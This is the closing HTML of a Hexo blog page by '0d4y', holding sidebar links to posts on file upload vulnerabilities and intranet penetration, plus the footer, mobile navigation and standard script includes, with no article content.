            <a href="/2019/01/10/2019-1-10-文件上传漏洞-一/">2019-1-10 文件上传漏洞(一)</a>
          </li>
        
          <li>
            <a href="/2019/01/10/about-me/">about me</a>
          </li>
        
          <li>
            <a href="/2018/09/07/2018-09-06-内网渗透/">内网渗透</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 0d4y<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>